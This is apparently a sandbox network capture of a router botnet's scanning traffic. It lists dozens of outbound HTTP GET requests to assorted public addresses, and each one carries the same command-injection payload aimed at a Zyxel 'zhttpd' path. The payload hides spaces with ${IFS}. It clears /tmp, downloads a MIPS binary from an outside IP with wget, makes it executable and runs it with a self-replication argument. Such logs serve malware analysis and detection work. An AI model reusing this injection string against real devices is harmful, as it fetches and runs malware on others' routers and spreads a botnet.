                                                Jan 28, 2024 10:16:20.744806051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3274192.168.2.2348702198.193.139.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744842052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3275192.168.2.234127444.204.162.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744854927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3276192.168.2.236024447.54.152.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744905949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3277192.168.2.23424124.66.205.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744926929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3278192.168.2.2343072209.163.86.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744955063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3279192.168.2.235244481.65.132.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744992971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3280192.168.2.2344726129.14.129.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745012999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3281192.168.2.2346914155.120.95.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745028019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3282192.168.2.2345338166.30.72.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745079994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3283192.168.2.2346384183.197.78.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745088100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3284192.168.2.235220853.220.66.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745110989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3285192.168.2.2352990126.159.255.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745143890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3286192.168.2.234036062.95.121.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745177031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3287192.168.2.2350506197.172.247.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745198965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3288192.168.2.2342890175.179.109.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745225906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3289192.168.2.233961873.182.89.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745243073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3290192.168.2.2353404182.46.200.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745261908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3291192.168.2.235163882.120.108.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745281935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3292192.168.2.2347752107.158.184.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745337009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3293192.168.2.235025087.211.156.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745357037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3294192.168.2.234895482.174.106.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745369911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3295192.168.2.2355640107.205.181.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745374918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3296192.168.2.235616281.105.108.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745414972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3297192.168.2.233860683.0.18.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745456934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3298192.168.2.2332952138.47.151.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745460987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3299192.168.2.2346154189.246.1.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745505095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3300192.168.2.2347900138.190.33.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745553970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3301192.168.2.234691642.50.153.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745568037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3302192.168.2.235033042.105.139.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745583057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3303192.168.2.23351481.147.185.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745609045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3304192.168.2.234411440.149.41.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745646000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3305192.168.2.2344554143.143.47.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745678902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3306192.168.2.235178840.155.150.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745711088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3307192.168.2.234230488.133.243.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745747089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3308192.168.2.236006670.151.61.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745806932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3309192.168.2.2347946141.91.40.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745831013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3310192.168.2.233554476.46.15.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745831013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3311192.168.2.2335958212.61.58.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745872974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3312192.168.2.2335088168.194.50.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745877981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3313192.168.2.2360064138.157.170.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745908976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3314192.168.2.2339440143.216.41.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745938063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3315192.168.2.2338456204.125.100.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.745960951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3316192.168.2.23569808.202.53.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746020079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3317192.168.2.2357714129.234.48.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746021032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3318192.168.2.2335332219.47.158.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746066093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3319192.168.2.2346838173.96.93.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746083021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3320192.168.2.233391470.67.62.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746115923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3321192.168.2.2342792142.179.170.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746115923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3322192.168.2.2335184216.60.173.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746154070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3323192.168.2.2351286213.55.87.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746189117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3324192.168.2.235745479.17.3.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746220112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3325192.168.2.235819241.136.194.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746258974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3326192.168.2.2346288105.25.35.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746299028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3327192.168.2.235187038.185.210.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746295929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3328192.168.2.235694253.146.250.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746325016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3329192.168.2.2334986167.217.203.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746360064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3330192.168.2.23459185.157.153.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746360064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3331192.168.2.235579839.90.116.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746397972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3332192.168.2.235232847.137.80.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746426105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3333192.168.2.233829481.27.171.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746434927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3334192.168.2.2345380222.32.167.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746486902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3335192.168.2.235367069.36.160.192443
                                                TimestampBytes transferredDirectionData
